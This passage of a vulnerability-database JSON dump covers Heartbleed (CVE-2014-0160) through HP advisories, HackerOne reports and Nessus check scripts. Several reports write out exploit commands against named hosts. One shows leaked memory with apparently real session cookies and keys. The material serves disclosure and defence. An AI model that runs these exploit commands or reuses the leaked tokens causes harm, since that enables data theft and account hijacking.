impacted versions are listed.\r\nHP Smart Update Manager (SUM) 6.0.0 through 6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Smart Update Manager (SUM). This bulletin will be revised when\r\nthe software updates are released.\r\n\r\nUntil the software updates are available, HP recommends limiting HP SUM usage\r\nto a secure and isolated private management network.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVnCEgCgs9NE3ajD5WkXefc30WZhR/JQ\r\ngwkAoNoHbkxpxzqSry1ZLk2OkJIc3Tnk\r\n=jhjw\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30476", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30476", "title": "[security bulletin] HPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260385\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260385\r\nVersion: 1\r\n\r\nHPSBMU03013 rev.1 - WMI Mapper for HP Systems Insight Manager running\r\nOpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-22\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with WMI Mapper for HP\r\nSystems Insight Manager running OpenSSL. 
This is the OpenSSL vulnerability\r\nknown as "Heartbleed" which could be exploited remotely resulting in\r\ndisclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101523\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nWMI Mapper for HP Systems Insight Manager v7.2.1, v7.2.2, v7.3, and v7.3.1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available for WMI Mapper for HP\r\nSystems Insight Manager to resolve the vulnerability.\r\n\r\nWMI Mapper 7.2.3 (to be used for 7.2, 7.2.1 and 7.2.2 upgrades)\r\nWMI Mapper 7.3.2 (to be used for 7.3 and 7.3.1 upgrades)\r\n\r\nThe software updates are available here:\r\n\r\nSoftware Version\r\n Location\r\n\r\nWMI Mapper 7.2.3\r\n http://www.hp.com/swpublishing/MTX-9ef95a0fdf044f7aa5f7a09445\r\n\r\nWMI Mapper 7.3.2\r\n http://www.hp.com/swpublishing/MTX-4503970ccd6841dca639ddbcee\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNW4IMACgkQ4B86/C0qfVmF8ACaAvPqjqJ+M0rI8rH+l1chmwY4\r\np/gAoIxRd6xqTFRbjlGtAFTc2jY01H1K\r\n=q4pb\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30506", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30506", "title": "[security bulletin] HPSBMU03013 rev.1 - WMI Mapper for HP Systems Insight Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "hackerone": [{"lastseen": "2018-11-23T14:56:22", "bulletinFamily": "bugbounty", "bounty": 200.0, "cvelist": [], "description": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0430 portal.sf.mail.ru\r\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c \u043a\u0443\u0441\u043a\u0430\u043c\u0438 \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c \u0434\u043e 64\u041a\u0411. 
\u041f\u0440\u0438\u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0432\u0443\u0441\u0442\u043e\u0440\u043e\u043d\u043d\u044f\u044f, \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0447\u0438\u0442\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043d\u043e \u0438 \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0447\u0430\u0441\u0442\u044c \u0432\u0430\u0448\u0435\u0439 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043a\u0430\u043a \u044d\u0442\u043e \u0441\u0434\u0435\u043b\u0430\u043b \u0438 \u044f \u0440\u0430\u0434\u0438 \u0447\u0438\u0441\u0442\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430.", "modified": "2014-12-10T19:29:15", "published": "2014-10-23T15:12:13", "id": "H1:32570", "href": "https://hackerone.com/reports/32570", "type": "hackerone", "title": "Mail.ru: OpenSSL HeartBleed (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-04T10:02:55", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": [], "description": "Pls see attachment files for details:\r\npython ssltest.py concrete5.org 443|more\r\n\r\nimpact: critical, pls patch it ASAP\r\n\r\nReferences:\r\nhttps://www.openssl.org/news/secadv_20140407.txt\r\nhttp://heartbleed.com\r\nhttps://github.com/openssl/openssl/commit/96db9023b881d7cd9f379b0c154650d6c108e9a3\r\n~g4mm4\r\nhttps://twitter.com/xchym", "modified": "2014-04-09T00:37:33", "published": "2014-04-08T11:01:31", "id": "H1:6475", "href": "https://hackerone.com/reports/6475", 
"type": "hackerone", "title": "concrete5: https://concrete5.org ::: HeartBleed Attack (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-23T12:55:41", "bulletinFamily": "bugbounty", "bounty": 150.0, "cvelist": ["CVE-2014-0160"], "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py 185.30.178.33 -p 1443\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: 185.30.178.33:1443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: 185.30.178.33:1443 returned more data than it should - server is vulnerable!\r\nPlease wait... connection attempt 1 of 1\r\n##################################################################\r\n\r\n.@....SC[...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.......X-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36\r\nReferer: https://adm.riotzone.net:1443/webadm/\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: en-US,en;q=0.8,ru;q=0.6\r\nCookie: fbm_335418533141749=base_domain=.riotzone.net; weblang=de; auser=1177778; atype=my; asess=2d53c33bbbb985848534e390323c0630; ashow=100007781204577@facebook; nofoo=1; anick=LaVerdad; aserv=1; level=50; sess_uid=1177778; sess_key=2d53c33bbbb985848534e390323c0630; __utma=72033936.1263205956.1413451723.1421595142.1421602346.373; __utmc=72033936; 
__utmz=72033936.1421073483.352.29.utmcsr=riotzone.net|utmccn=(referral)|utmcmd=referral|utmcct=/riot/RiotLoaderRelease.swf\r\n\r\n.....\r\nSM....)..Z..............b....o...~..^..DF..4......g..%.E.EaVHhJUTZhak8xNWdJYTRIZExkVXpuSVUxVmIwZHVrSV9ZTWw0bkpEQktHVkQyQ3Fpb190MGZFclhMYVg2bjVBMTZnVkZpMWlHMzJ3VFVPNTlvZFR2VU5QWnBjZXBRaVh5OTNHdVR5cEJlR2NCUzhENWR5WXJTcU1CNHRteTl2Q01YTUhjQ212STFkRzZid0poaCIsImlzc3VlZF9hdCI6MTQyMTYwMjM1NCwidXNlcl9pZCI6IjEwMDAwNzc4MTIwNDU3NyJ9; sess_uid=1177778; sess_key=2d53c33bbbb985848534e390323c0630; __utma=72033936.1263205956.1413451723.1421595142.1421602346.373; __utmb=72033936.2.10.1421602346; __utmc=72033936; __utmz=72033936.1421073483.352.29.utmcsr=riotzone.net|utmccn=(referral)|utmcmd=referral|utmcct=/riot/RiotLoaderRelease.swf\r\n", "modified": "2015-09-13T12:13:15", "published": "2015-01-19T13:54:12", "id": "H1:44294", "href": "https://hackerone.com/reports/44294", "type": "hackerone", "title": "Mail.ru: Heartbleed: my.com (185.30.178.33) port 1433", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-23T12:55:41", "bulletinFamily": "bugbounty", "bounty": 150.0, "cvelist": ["CVE-2014-0160"], "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py scfbp.tng.mail.ru\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: scfbp.tng.mail.ru:443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: scfbp.tng.mail.ru:443 returned more data than it should - server is vulnerable!\r\nPlease wait... 
connection attempt 1 of 1\r\n##################################################################\r\n\r\n.@....SC[...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.........Y.[.uu.n.~J....4.F.P.<.5}b.n\r\n.................................3t.............http/1.1.spdy/3.1.h2-14uP.........\r\n.............WXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1\r\nHost: 195.211.20.229\r\nAccept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1\r\n", "modified": "2015-09-13T12:16:27", "published": "2015-02-25T07:49:11", "id": "H1:49139", "href": "https://hackerone.com/reports/49139", "type": "hackerone", "title": "Mail.ru: scfbp.tng.mail.ru: Heartbleed", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2021-01-12T10:12:42", "description": "Fixes CVE-2014-0160 (RHBZ #1085066)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 13, "published": "2014-04-15T00:00:00", "title": "Fedora 20 : mingw-openssl-1.0.1e-6.fc20 (2014-4982) (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:mingw-openssl", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-4982.NASL", "href": "https://www.tenable.com/plugins/nessus/73509", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-4982.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73509);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"FEDORA\", value:\"2014-4982\");\n\n script_name(english:\"Fedora 20 : mingw-openssl-1.0.1e-6.fc20 (2014-4982) (Heartbleed)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixes CVE-2014-0160 (RHBZ #1085066)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1085066\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131346.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d2b791cc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mingw-openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || 
\"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"mingw-openssl-1.0.1e-6.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-openssl\");\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-01T02:33:27", "description": "According to its banner, the version of FileZilla Server running on\nthe remote host is prior to 0.9.44. It is, therefore, affected by\nan information disclosure vulnerability.\n\nAn information disclosure flaw exists with the OpenSSL included with\nFileZilla Server. 
A remote attacker could read the contents of up to\n64KB of server memory, potentially exposing passwords, private keys,\nand other sensitive data.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 25, "published": "2014-04-21T00:00:00", "title": "FileZilla Server < 0.9.44 OpenSSL Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:filezilla:filezilla_server"], "id": "FILEZILLA_SERVER_0944.NASL", "href": "https://www.tenable.com/plugins/nessus/73640", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73640);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"FileZilla Server < 0.9.44 OpenSSL Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the banner version of FileZilla Server\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by an information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of FileZilla Server running on\nthe remote host is prior to 0.9.44. It is, therefore, affected by\nan information disclosure vulnerability.\n\nAn information disclosure flaw exists with the OpenSSL included with\nFileZilla Server. 
A remote attacker could read the contents of up to\n64KB of server memory, potentially exposing passwords, private keys,\nand other sensitive data.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://filezilla-project.org/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to FileZilla Server version 0.9.44 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:filezilla:filezilla_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 
2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\");\n script_require_keys(\"ftp/filezilla\");\n script_require_ports(\"Services/ftp\", 21);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nexit(0, \"Temporarily deprecated.\");\n\nport = get_ftp_port(default: 21);\n\nbanner = get_ftp_banner(port:port);\nif (!banner) audit(AUDIT_WEB_BANNER_NOT, port);\nif (\"FileZilla Server\" >!< banner) audit(AUDIT_WRONG_WEB_SERVER, port, \"FileZilla Server\");\n\nbanner = strstr(banner, \"FileZilla Server\");\nbanner = banner - strstr(banner, '\\r\\n');\n\nversion = eregmatch(pattern:\"FileZilla Server version (\\d\\.\\d\\.(\\d\\d[a-e]|\\d\\d|\\d[a-e]|\\d))\",string:banner);\n\nif(isnull(version)) audit(AUDIT_UNKNOWN_WEB_SERVER_VER, \"FileZilla Server\", port);\n\nif (\n version[1] =~ \"^0\\.[0-8]($|[^0-9])\" ||\n version[1] =~ \"^0\\.9\\.([0-9]|[1-3][0-9]|4[0-3])($|[^0-9])\"\n)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Application : FileZilla Server' +\n '\\n Version : ' + version[1] +\n '\\n Fixed : 0.9.44' +\n '\\n Banner : ' + banner +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"FileZilla Server\", version[1]);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T03:15:36", "description": "The version of HP LoadRunner installed on the remote host is 11.52.x\nprior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. 
It is,\ntherefore, affected by an out-of-bounds read error, known as the\n'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.", "edition": 27, "published": "2014-08-07T00:00:00", "title": "HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:loadrunner"], "id": "HP_LOADRUNNER_12_00_1.NASL", "href": "https://www.tenable.com/plugins/nessus/77054", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77054);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"HPSBMU03040\");\n script_xref(name:\"HP\", value:\"SSRT101565\");\n\n script_name(english:\"HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the version of HP LoadRunner.\");\n\n 